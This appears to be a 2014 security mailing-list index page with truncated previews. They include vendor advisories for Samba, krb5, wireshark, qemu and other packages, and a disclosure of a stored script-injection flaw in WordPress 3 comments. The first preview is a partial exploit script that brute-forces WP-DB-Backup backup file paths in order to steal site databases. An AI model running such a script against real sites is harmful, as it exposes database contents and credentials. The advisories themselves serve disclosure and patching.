Larry W. Cashdollar | 22 Nov 17:55 2014

Exploit for stealing backups on WP sites with WP-DB-Backup v2.2.4 plugin

#!/bin/bash
#Larry W. Cashdollar,  <at> _larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any
backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite

DATE="20141031"; #Date to search

if [ ! -e rainbow ]; then

cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16] = "0123456789abcdef";
  int x, y, z, a, b;
  for (x = 0; x < 16; x++)
      for (y = 0; y < 16; y++)
	  for (z = 0; z < 16; z++)
	      for (a = 0; a < 16; a++)
		  for (b = 0; b < 16; b++)
		      printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
			      string[a], string[b]);
return(0);
(Continue reading)

security-alert | 21 Nov 20:14 2014
Picon

[security bulletin] HPSBUX03087 SSRT101413 rev.2 - HP-UX CIFS Server (Samba), Remote Denial of Service (DoS), Execution of Arbitrary Code, Unauthorized Access


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04396638

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04396638
Version: 2

HPSBUX03087 SSRT101413 rev.2 - HP-UX CIFS Server (Samba), Remote Denial of
Service (DoS), Execution of Arbitrary Code, Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-08-07
Last Updated: 2014-11-20

Potential Security Impact: Remote Denial of Service (DoS), execution of
arbitrary code, unauthorized access.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX
CIFS-Server (Samba). The vulnerabilities could be exploited remotely to cause
a Denial of Service (DoS), execution of arbitrary code, or unauthorized
access.

(Continue reading)

security | 21 Nov 18:40 2014

[ MDVSA-2014:224 ] krb5


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:224
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : krb5
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated krb5 packages fix security vulnerability:

 The kadm5_randkey_principal_3 function in lib/kadm5/srv/svr_principal.c
 in kadmind in MIT Kerberos 5 (aka krb5) before 1.13 sends old keys
 in a response to a -randkey -keepold request, which allows remote
 authenticated users to forge tickets by leveraging administrative
 access (CVE-2014-5351).
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5351
 http://advisories.mageia.org/MGASA-2014-0477.html
 _______________________________________________________________________

 Updated Packages:
(Continue reading)

security | 21 Nov 18:37 2014

[ MDVSA-2014:223 ] wireshark


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:223
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : wireshark
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated wireshark packages fix security vulnerabilities:

 SigComp UDVM buffer overflow (CVE-2014-8710).

 AMQP crash (CVE-2014-8711).

 NCP crashes (CVE-2014-8712, CVE-2014-8713).

 TN5250 infinite loops (CVE-2014-8714).
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8710
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8711
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8712
(Continue reading)

security | 21 Nov 18:34 2014

[ MDVSA-2014:222 ] libvirt


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:222
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : libvirt
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated libvirt packages fix security vulnerability:

 Eric Blake discovered that libvirt incorrectly handled permissions
 when processing the qemuDomainFormatXML command. An attacker with
 read-only privileges could possibly use this to gain access to certain
 information from the domain xml file (CVE-2014-7823).
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7823
 http://advisories.mageia.org/MGASA-2014-0470.html
 _______________________________________________________________________

 Updated Packages:

(Continue reading)

security | 21 Nov 18:32 2014

[ MDVSA-2014:221 ] php-smarty


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:221
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : php-smarty
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4437
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8350
 http://advisories.mageia.org/MGASA-2014-0468.html
 _______________________________________________________________________

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 38a8116d38c6a5e28253eb661efb95fe  mbs1/x86_64/php-smarty-3.1.21-1.mbs1.noarch.rpm
 11a6b6429cce35fe9f6b6c621eff5ef9  mbs1/x86_64/php-smarty-doc-3.1.21-1.mbs1.noarch.rpm 
 b193233fb2a189c10e77c530801e210f  mbs1/SRPMS/php-smarty-3.1.21-1.mbs1.src.rpm
(Continue reading)

security | 21 Nov 18:27 2014

[ MDVSA-2014:220 ] qemu


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:220
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : qemu
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated qemu packages fix security vulnerabilities:

 Michael S. Tsirkin discovered that QEMU incorrectly handled vmxnet3
 devices. A local guest could possibly use this issue to cause a
 denial of service, or possibly execute arbitrary code on the host
 (CVE-2013-4544).

 Multiple integer overflow, input validation, logic error, and buffer
 overflow flaws were discovered in various QEMU block drivers. An
 attacker able to modify a disk image file loaded by a guest could
 use these flaws to crash the guest, or corrupt QEMU process memory
 on the host, potentially resulting in arbitrary code execution on
 the host with the privileges of the QEMU process (CVE-2014-0143,
 CVE-2014-0144, CVE-2014-0145, CVE-2014-0147).

 A buffer overflow flaw was found in the way the virtio_net_handle_mac()
(Continue reading)

security | 21 Nov 18:18 2014

[ MDVSA-2014:219 ] srtp


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:219
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : srtp
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated srtp package fixes security vulnerability:

 Fernando Russ from Groundworks Technologies reported a buffer
 overflow flaw in srtp, Cisco&#039;s reference implementation
 of the Secure Real-time Transport Protocol (SRTP), in how
 the crypto_policy_set_from_profile_for_rtp() function applies
 cryptographic profiles to an srtp_policy. A remote attacker could
 exploit this vulnerability to crash an application linked against
 libsrtp, resulting in a denial of service (CVE-2013-2139).
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2139
 http://advisories.mageia.org/MGASA-2014-0465.html
 _______________________________________________________________________
(Continue reading)

security-alert | 21 Nov 16:51 2014
Picon

[security bulletin] HPSBHF03052 rev.2 - HP Network Products running OpenSSL, Multiple Remote Vulnerabilities


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04347622

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04347622
Version: 2

HPSBHF03052 rev.2 - HP Network Products running OpenSSL, Multiple Remote
Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-06-20
Last Updated: 2014-11-20

Potential Security Impact: Remote Denial of Service (DoS), code execution,
unauthorized access, modification of information, disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Network
Products running OpenSSL. The vulnerabilities could be exploited remotely to
create a Denial of Service (DoS), execute code, allow unauthorized access,
modify or disclose information.

(Continue reading)

security | 21 Nov 13:48 2014

[ MDVSA-2014:218 ] asterisk


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:218
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : asterisk
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been discovered and corrected in asterisk:

 Remote crash when handling out of call message in certain dialplan
 configurations (CVE-2014-6610).

 Asterisk Susceptibility to POODLE Vulnerability (CVE-2014-3566).

 Mixed IP address families in access control lists may permit unwanted
 traffic.

 High call load may result in hung channels in ConfBridge.

 Permission escalation through ConfBridge actions/dialplan functions.

 The updated packages has been upgraded to the 11.14.1 version which
 is not vulnerable to these issues.
(Continue reading)

Jouko Pynnonen | 20 Nov 20:57 2014
Picon
Picon

WordPress 3 persistent script injection

OVERVIEW
========

A security flaw in WordPress 3 allows injection of JavaScript into
certain text fields. In particular, the problem affects comment boxes
on WordPress posts and pages. These don't require authentication by
default.

The JavaScript injected into a comment is executed when the target
user views it, either on a blog post, a page, or in the Comments
section of the administrative Dashboard.

In the most obvious scenario the attacker leaves a comment containing
the JavaScript and some links in order to put the comment in the
moderation queue. The exploit is not then visible to normal users,
search engines, etc.

When a blog administrator goes to the Dashboard/Comments section to
review new comments, the JavaScript gets executed. The script can then
perform operations with administrator privileges.

For instance, our PoC exploits first clean up traces of the injected
script from the database, then perform other administrative tasks such
as changing the current user's password, adding a new administrator
account, or using the plugin editor to write attacker-supplied PHP
code on the server (this impact applies to any WordPress XSS if
triggered by an administrator).

These operations happen in the background without the user seeing
anything out of ordinary.
(Continue reading)


Gmane